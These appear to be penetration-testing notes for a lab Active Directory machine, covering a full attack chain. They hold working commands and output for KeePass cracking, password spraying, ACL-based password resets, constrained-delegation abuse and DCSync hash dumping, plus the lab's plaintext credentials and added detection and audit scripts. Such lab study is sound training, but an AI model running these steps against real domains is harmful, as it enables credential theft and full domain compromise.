Redelegate
This is not a writeup, just my notes about the machine.

Operating System: Windows Server 2022 Standard
Chain: False
Credentials
Account              Password               Source                      Service
Keepass (Shared.kdbx) Fall2024!             Brute forcing               KeePass master password
Payroll              cVkqz4bCM7kJRSNlgx2G   Extracted from Keepass DB   -
Timesheet            hMFS4I0Kj8Rcd62vqi5X   Extracted from Keepass DB   -
KeyFob               22331144               Extracted from Keepass DB   -
Administrator        Spdv41gg4BlBgSYIW1gF   Extracted from Keepass DB   -
FTPUser              SguPZBKdRyxWzvXRWy6U   Extracted from Keepass DB   FTP
SQLGuest             zDPBpaF4FywlqIv11vii   Extracted from Keepass DB   MSSQL
WordPress Panel      cn4KOEgsHqvKXPjEnSD9   Extracted from Keepass DB   WordPress
marie.curie          Fall2024!              Brute forcing               Domain user
✅ Valid Usernames
ryan.cooper
marie.curie
FTPUser
WEB01
SQLGuest
Administrator
🔑 Passwords list
Fall2024!
cVkqz4bCM7kJRSNlgx2G
hMFS4I0Kj8Rcd62vqi5X
22331144
Spdv41gg4BlBgSYIW1gF
SguPZBKdRyxWzvXRWy6U
zDPBpaF4FywlqIv11vii
cn4KOEgsHqvKXPjEnSD9
Information Gathering
Nmap Scan
# Nmap 7.94SVN scan initiated Mon Apr 14 17:32:47 2025 as: nmap -sS -T5 -p- --open -A -Pn -n -oN ext_tcp_redelegate_allports -vvv 10.10.67.58
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-14 21:35:17Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5357/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49675/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49932/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
61346/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
61358/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
61360/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Enumeration
FTP
Anonymous FTP login allowed
❯ wget -m --no-passive ftp://anonymous:anonymous@10.10.67.58
<SNIP>
2025-04-14 17:44:49 (57.4 MB/s) - ‘10.10.67.58/CyberAudit.txt’ saved [434
2025-04-14 17:44:50 (396 MB/s) - ‘10.10.67.58/Shared.kdbx’ saved [2622]
2025-04-14 17:44:50 (54.1 KB/s) - ‘10.10.67.58/TrainingAgenda.txt’ saved [580]
File: CyberAudit.txt
----------------------------------
OCTOBER 2024 AUDIT FINDINGS
[!] CyberSecurity Audit findings:
1) Weak User Passwords
2) Excessive Privilege assigned to users
3) Unused Active Directory objects
4) Dangerous Active Directory ACLs
[*] Remediation steps:
1) Prompt users to change their passwords: DONE
2) Check privileges for all users and remove high privileges: DONE
3) Remove unused objects in the domain: IN PROGRESS
4) Recheck ACLs: IN PROGRESS
File: TrainingAgenda.txt
-----------------------------
EMPLOYEE CYBER AWARENESS TRAINING AGENDA (OCTOBER 2024)
Friday 4th October | 14.30 - 16.30 - 53 attendees
"Don't take the bait" - How to better understand phishing emails and what to do when you see one
Friday 11th October | 15.30 - 17.30 - 61 attendees
"Social Media and their dangers" - What happens to what you post online?
Friday 18th October | 11.30 - 13.30 - 7 attendees
"Weak Passwords" - Why "SeasonYear!" is not a good password
Friday 25th October | 9.30 - 12.30 - 29 attendees
"What now?" - Consequences of a cyber attack and how to mitigate them
KeePass database (no success with rockyou)
❯ keepass2john Shared.kdbx > keepass.hash
❯ hashcat -m 13400 --user keepass.hash /usr/share/wordlists/rockyou.txt
Note: keepass2john prefixes the hash with the database name, so hashcat needs --user to skip that field, and the plain master-password mode is 13400 (29700 is the keyfile-only variant). rockyou.txt is a 2009 leak, so a password built from the current year is not going to be in it; the hint in TrainingAgenda.txt is what cracks this database.
DNS
Not vulnerable to DNS Zone Transfer
HTTP
IIS Default Website
Kerberos
Username format: firstname.lastname@redelegate.vl
❯ /opt/kerbrute/kerbrute userenum --dc 10.10.67.58 -d redelegate.vl /opt/statistically-likely-usernames/john.smith.txt -t 100
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 04/14/25 - Ronnie Flathers @ropnop
2025/04/14 17:56:51 > Using KDC(s):
2025/04/14 17:56:51 > 10.10.67.58:88
2025/04/14 17:56:57 > [+] VALID USERNAME: ryan.cooper@redelegate.vl
2025/04/14 18:00:18 > [+] VALID USERNAME: marie.curie@redelegate.vl
2025/04/14 18:03:38 > Done! Tested 248231 usernames (2 valid) in 407.089 seconds
Two valid users obtained: ryan.cooper and marie.curie
SMB (enum4linux-ng)
Domain SID: S-1-5-21-4024337825-2033394866-2055507597
Server allows null session
Initial Foothold
Bruteforcing the KeePass database
TrainingAgenda.txt, found on the FTP share, hints that user passwords follow the SeasonYear! pattern.
The tester created a file as follows:
File: possible-passwords.txt
---------------------------------
spring
summer
fall
winter
autumn
The tester created a hashcat rules file as follows:
File: custom.rule
---------------------------------
:
l
u
$2$0$2$3
$2$0$2$4
$2$0$2$5
c $2$0$2$3
c $2$0$2$4
c $2$0$2$5
$2$0$2$3 $!
$2$0$2$4 $!
$2$0$2$5 $!
c $2$0$2$3 $!
c $2$0$2$4 $!
c $2$0$2$5 $!
Finally, the rules were applied to the seed words to produce the final wordlist:
❯ hashcat --force possible-passwords.txt -r custom.rule --stdout | sort -u > mut_passwords.txt
❯ john keepass.hash -w=mut_passwords.txt
<SNIP>
Fall2024! (?)
<SNIP>
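The same mutation in Python, as an added example that is not part of the original notes: it reproduces what possible-passwords.txt plus custom.rule generate (bare word, lowercase and uppercase, year appended with and without the "!" suffix, on the lowercase and capitalised word) and takes the year range and suffix list as parameters, so the 2023-2025 default is an assumption to adjust to the target. Its output plays the role of mut_passwords.txt.

```python
# Added example, not from the original notes: Python equivalent of
# possible-passwords.txt + custom.rule, with the year range and suffixes as
# parameters (the defaults reproduce the rule file: 2023-2025, "" and "!").
from itertools import product

# seed words, as in possible-passwords.txt
SEASONS = ["spring", "summer", "fall", "winter", "autumn"]


def mutate(words, years=range(2023, 2026), suffixes=("", "!")):
    """Apply the SeasonYear! mutations and return a sorted, de-duplicated list."""
    out = set()
    for w in words:
        lower, upper, cap = w.lower(), w.upper(), w.capitalize()
        out.update({w, lower, upper})          # rules ':', 'l', 'u'
        for year, suffix in product(years, suffixes):
            # '$2$0$2$3' on the word as-is and 'c $2$0$2$3' on the capitalised
            # word, each with and without the trailing '$!'
            for base in (w, cap):
                out.add(f"{base}{year}{suffix}")
    return sorted(out)


if __name__ == "__main__":
    # same role as `hashcat --stdout | sort -u > mut_passwords.txt`
    print("\n".join(mutate(SEASONS)))
```

Run it and redirect to a file, then feed that file to john or hashcat exactly as mut_passwords.txt was used above; widening the year range costs only a few dozen extra candidates per season.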
Enumerating the database
❯ kpcli --kdb=Shared.kdbx
Provide the master password: *************************
KeePass CLI (kpcli) v3.8.1 is ready for operation.
<SNIP>
The tester was able to retrieve a list of valid credentials stored in the KeePass database (see the Passwords list above).
Spraying the collected passwords against the known users (users.txt and passwords.txt are the two lists above)
❯ nxc smb 10.10.67.58 -u users.txt -p passwords.txt --continue-on-success | grep "[+]"
SMB 10.10.67.58 445 DC [+] redelegate.vl\marie.curie:Fall2024!
❯ nxc mssql 10.10.67.58 -u users.txt -p passwords.txt --continue-on-success | grep "[+]"
MSSQL 10.10.67.58 1433 DC [+] redelegate.vl\marie.curie:Fall2024!
Finding kerberoastable and asreproastable users
❯ nxc ldap 10.10.67.58 -u 'marie.curie' -p 'Fall2024!' --asreproast asreproast.hashes
SMB 10.10.67.58 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
LDAP 10.10.67.58 389 DC [+] redelegate.vl\marie.curie:Fall2024!
LDAP 10.10.67.58 389 DC [*] Total of records returned 3
LDAP 10.10.67.58 389 DC No entries found!
❯ nxc ldap 10.10.67.58 -u 'marie.curie' -p 'Fall2024!' --kerberoast kerberoast.hashes
SMB 10.10.67.58 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
LDAP 10.10.67.58 389 DC [+] redelegate.vl\marie.curie:Fall2024!
LDAP 10.10.67.58 389 DC Bypassing disabled account krbtgt
LDAP 10.10.67.58 389 DC No entries found!
LDAP 10.10.67.58 389 DC [-] Error with the LDAP account used
Abusing DACL misconfiguration
Taking over domain users (marie.curie holds a password-reset right over these accounts)

❯ bloodyAD -u 'marie.curie' -p 'Fall2024!' -d redelegate.vl --dc-ip 10.10.98.61 set password 'James.Dinkleberg' 'Passsword123!'
[+] Password changed successfully!
❯ bloodyAD -u 'marie.curie' -p 'Fall2024!' -d redelegate.vl --dc-ip 10.10.98.61 set password 'Guest' 'Passsword123!'
[+] Password changed successfully!
Constrained Delegation

Constrained Delegation from Linux
Changing the user account password
Helen.Frost is a member of Remote Management Users, so she is allowed to authenticate remotely over WinRM.
❯ bloodyAD -u 'marie.curie' -p 'Fall2024!' -d redelegate.vl --dc-ip 10.10.98.61 set password 'Helen.Frost' 'Passsword123!'
[+] Password changed successfully!
Changing the computer account password
# Using bloodyAD
❯ bloodyAD -u 'Helen.Frost' -p 'Passsword123!' -d redelegate.vl --dc-ip 10.10.98.61 set password 'FS01$' 'Passsword123!'
[+] Password changed successfully!
# Using net rpc (prompts for the new password)
❯ net rpc password "FS01$" -U "redelegate.vl"/"Helen.Frost" -S 10.10.98.61
Adding the TRUSTED_TO_AUTH_FOR_DELEGATION flag to userAccountControl (enables protocol transition, i.e. S4U2Self for arbitrary users)
❯ bloodyAD -u 'Helen.Frost' -p 'Passsword123!' -d redelegate.vl --dc-ip 10.10.98.61 add uac 'FS01$' -f TRUSTED_TO_AUTH_FOR_DELEGATION
[-] ['TRUSTED_TO_AUTH_FOR_DELEGATION'] property flags added to FS01$'s userAccountControl
❯ bloodyAD -u 'Helen.Frost' -p 'Passsword123!' -d redelegate.vl --dc-ip 10.10.98.61 get object 'FS01$' --attr 'useraccountcontrol'
Setting msDS-AllowedToDelegateTo to the DC's LDAP SPN
❯ bloodyAD -u 'Helen.Frost' -p 'Passsword123!' -d redelegate.vl --dc-ip 10.10.98.61 set object 'FS01$' 'msDS-AllowedToDelegateTo' -v 'ldap/dc.redelegate.vl'
[+] FS01$'s msDS-AllowedToDelegateTo has been updated
❯ bloodyAD -u 'Helen.Frost' -p 'Passsword123!' -d redelegate.vl --dc-ip 10.10.98.61 get object 'FS01$' --attr msDS-AllowedToDelegateTo
Requesting a service ticket for ldap/dc.redelegate.vl as dc via S4U2Self + S4U2Proxy
❯ impacket-getST 'redelegate.vl'/'FS01$':'Passsword123!' -impersonate dc -spn 'ldap/dc.redelegate.vl' 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating dc
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc@ldap_dc.redelegate.vl@REDELEGATE.VL.ccache
Performing DCSync Attack
❯ KRB5CCNAME='dc@ldap_dc.redelegate.vl@REDELEGATE.VL.ccache' impacket-secretsdump -k -no-pass dc.redelegate.vl -just-dc-user krbtgt
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9288173d697316c718bb0f386046b102:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:bff2ae7dfc202b4e7141a440c00b91308c45ea918b123d7e97cba1d712e6a435
krbtgt:aes128-cts-hmac-sha1-96:9690508b681c1ec11e6d772c7806bc71
krbtgt:des-cbc-md5:b3ce46a1fe86cb6b
[*] Cleaning up...
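Detection side of this step, as an added example that is not part of the original notes. The usual DCSync rule is "event 4662 carrying a replication control-access GUID from an account that is not a domain controller", but here the replication is done with a ticket for the DC's own computer account, so the example also correlates the 4662 with the 4624 network logon of the same logon session and alerts when a DC account replicates from an address that is not a known DC. The DC name and address, and all event records, are constructed for the example.

```python
# Added example, not from the original notes: DCSync detection over constructed
# Windows Security events (4624 network logons + 4662 directory service access).
REPLICATION_GUIDS = {
    "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",  # DS-Replication-Get-Changes
    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",  # DS-Replication-Get-Changes-All
    "{89e95b76-444d-4c62-991a-0facbeda640c}",  # DS-Replication-Get-Changes-In-Filtered-Set
}
DC_ACCOUNTS = {"DC$"}            # assumption: a single DC named DC
DC_ADDRESSES = {"10.10.67.58"}   # assumption: that DC's own address


def is_replication_request(ev):
    """True for a 4662 whose requested access includes a replication right."""
    if ev["EventID"] != 4662:
        return False
    props = ev["Properties"].lower()
    return any(guid in props for guid in REPLICATION_GUIDS)


def detect_dcsync(events):
    """Return (account, source address, reason) for each suspicious replication."""
    # logon id -> source address, taken from 4624 network (type 3) logons
    sessions = {ev["TargetLogonId"]: ev["IpAddress"]
                for ev in events if ev["EventID"] == 4624 and ev["LogonType"] == 3}
    findings = []
    for ev in events:
        if not is_replication_request(ev):
            continue
        account = ev["SubjectUserName"]
        source = sessions.get(ev["SubjectLogonId"], "unknown")
        if account.upper() not in DC_ACCOUNTS:
            findings.append((account, source, "replication rights exercised by a non-DC account"))
        elif source not in DC_ADDRESSES:
            findings.append((account, source, "DC account replicating from a non-DC address"))
    return findings


# Constructed events: a user running DCSync directly, then the delegated case
# from this machine (network logon as DC$ from the attacker box, then GetNCChanges),
# then an unrelated 4662 that must not fire.
SAMPLE_EVENTS = [
    {"EventID": 4624, "TargetUserName": "marie.curie", "LogonType": 3,
     "IpAddress": "10.10.14.5", "TargetLogonId": "0x4a1b2c"},
    {"EventID": 4662, "SubjectUserName": "marie.curie", "SubjectLogonId": "0x4a1b2c",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4624, "TargetUserName": "DC$", "LogonType": 3,
     "IpAddress": "10.10.14.5", "TargetLogonId": "0x4a1f77"},
    {"EventID": 4662, "SubjectUserName": "DC$", "SubjectLogonId": "0x4a1f77",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "Helen.Frost", "SubjectLogonId": "0x4a2000",
     "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},  # not a replication right
]

if __name__ == "__main__":
    for finding in detect_dcsync(SAMPLE_EVENTS):
        print(finding)
```

In a single-DC domain the DC account should never show up as a replication requester at all, since a DC does not replicate from itself; in a multi-DC domain the source-address correlation is what separates the impersonated ticket from real inter-DC replication.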
Constrained Delegation from Windows
Changing computer Account password
*Evil-WinRM* PS C:\Temp> Set-ADAccountPassword -Identity "FS01$" -Reset -NewPassword (ConvertTo-SecureString "NewPassword123!" -AsPlainText -Force) -Verbose
Adding the TRUSTED_TO_AUTH_FOR_DELEGATION flag (protocol transition)
*Evil-WinRM* PS C:\Temp> Set-ADAccountControl -Identity "FS01$" -TrustedToAuthForDelegation $True
*Evil-WinRM* PS C:\Temp> Get-ADComputer FS01 -Properties TrustedToAuthForDelegation
Setting msDS-AllowedToDelegateTo to the DC's LDAP SPN
*Evil-WinRM* PS C:\Temp> Set-ADObject -Identity "CN=FS01,CN=COMPUTERS,DC=REDELEGATE,DC=VL" -Replace @{"msDS-AllowedToDelegateTo"="ldap/dc.redelegate.vl"}
*Evil-WinRM* PS C:\Temp> Get-ADComputer FS01 -Properties msDS-AllowedToDelegateTo
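The verification steps above (bloodyAD get object --attr userAccountControl / msDS-AllowedToDelegateTo on Linux, Get-ADComputer on Windows) print raw attribute values. The following is an added example, not part of the original notes, that decodes a userAccountControl value, classifies the delegation configuration that results, and flags the accounts a defender would want to find; it also shows the NOT_DELEGATED check that would have protected the impersonated account. The flag values are the documented userAccountControl bits; the sample objects are constructed.

```python
# Added example, not from the original notes: decode userAccountControl and
# classify delegation settings, i.e. the check behind the "get object --attr"
# and Get-ADComputer verification steps.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",                # domain controller
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",             # unconstrained delegation
    0x100000: "NOT_DELEGATED",                     # "account is sensitive and cannot be delegated"
    0x400000: "DONT_REQ_PREAUTH",                  # AS-REP roastable
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",   # protocol transition (S4U2Self for any user)
}


def decode_uac(value):
    """Names of the bits set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def classify_delegation(uac, allowed_to_delegate_to):
    """Delegation type from the UAC bits and msDS-AllowedToDelegateTo."""
    flags = decode_uac(uac)
    if "TRUSTED_FOR_DELEGATION" in flags:
        return "unconstrained"
    if allowed_to_delegate_to:
        if "TRUSTED_TO_AUTH_FOR_DELEGATION" in flags:
            return "constrained (protocol transition)"
        return "constrained (Kerberos only)"
    return "none"


def can_be_impersonated(target_uac):
    """S4U2Proxy is refused for a target marked NOT_DELEGATED; this is the
    per-account control that would have stopped impersonating dc above
    (Protected Users membership has the same effect but is not a UAC bit)."""
    return "NOT_DELEGATED" not in decode_uac(target_uac)


def audit(objects):
    """Flag accounts that can mint service tickets for other users via protocol
    transition, or that are unconstrained; DCs are excluded as they are
    trusted for delegation by design."""
    findings = []
    for obj in objects:
        uac = obj["userAccountControl"]
        targets = obj.get("msDS-AllowedToDelegateTo", [])
        if "SERVER_TRUST_ACCOUNT" in decode_uac(uac):
            continue
        kind = classify_delegation(uac, targets)
        if kind in ("unconstrained", "constrained (protocol transition)"):
            findings.append((obj["sAMAccountName"], kind, targets))
    return findings


# Constructed objects: FS01$ as modified in the attack (4096 | 0x1000000 = 16781312),
# a DC, an untouched workstation and a user.
SAMPLE_OBJECTS = [
    {"sAMAccountName": "FS01$", "userAccountControl": 16781312,
     "msDS-AllowedToDelegateTo": ["ldap/dc.redelegate.vl"]},
    {"sAMAccountName": "DC$", "userAccountControl": 0x2000 | 0x80000},
    {"sAMAccountName": "WEB01$", "userAccountControl": 4096},
    {"sAMAccountName": "Helen.Frost", "userAccountControl": 0x200},
]

if __name__ == "__main__":
    for name, kind, targets in audit(SAMPLE_OBJECTS):
        print(f"{name}: {kind} -> {targets}")
```

Feed it the attribute values returned by the bloodyAD or Get-ADComputer calls above: a workstation whose userAccountControl went from 4096 to 16781312 and gained an msDS-AllowedToDelegateTo pointing at a DC SPN is exactly the change made in this chain.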
Requesting a TGT for FS01$ with asktgt, then a service ticket as dc via S4U2Self and S4U2Proxy
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> .\Rubeus.exe asktgt /user:FS01$ /password:'NewPassword123!' /nowrap
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> ./Rubeus.exe s4u /impersonateuser:dc /msdsspn:ldap/dc.redelegate.vl /ticket:<TICKET> /ptt
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> klist
Current LogonId is 0:0x79303
Cached Tickets: (1)
#0> Client: dc @ REDELEGATE.VL
Server: ldap/dc.redelegate.vl @ REDELEGATE.VL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 4/14/2025 21:42:10 (local)
End Time: 4/15/2025 7:41:56 (local)
Renew Time: 4/21/2025 21:41:56 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
Performing DCSync attack using mimikatz (not working)
Note: 0x00002105 (8453) is ERROR_DS_DRA_ACCESS_DENIED, i.e. the DRS bind succeeded but the identity the RPC call was authenticated as holds no replication rights; since the same dc ticket works with secretsdump from Linux, this points at the injected ticket not being the credential actually used for the call. The c0000061 from privilege::debug is STATUS_PRIVILEGE_NOT_HELD and is harmless here, as SeDebugPrivilege is not needed for DCSync.
If someone knows why this happened, please contact me. I would really appreciate understanding why this is not working as expected.
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> .\mimikatz.exe privilege::debug "lsadump::dcsync /all /patch" exit
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
mimikatz(commandline) # lsadump::dcsync /all /patch
[DC] 'redelegate.vl' will be the domain
[DC] 'dc.redelegate.vl' will be the DC server
[DC] Exporting domain 'redelegate.vl'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x00002105 (8453)
mimikatz(commandline) # exit
Bye!
Performing DCSync attack using the impacket toolkit (getST with the new FS01$ password, then secretsdump -k as in the Linux section)
❯ impacket-getST 'redelegate.vl'/'FS01$':'NewPassword123!' -impersonate dc -spn 'ldap/dc.redelegate.vl' 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating dc
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc@ldap_dc.redelegate.vl@REDELEGATE.VL.ccache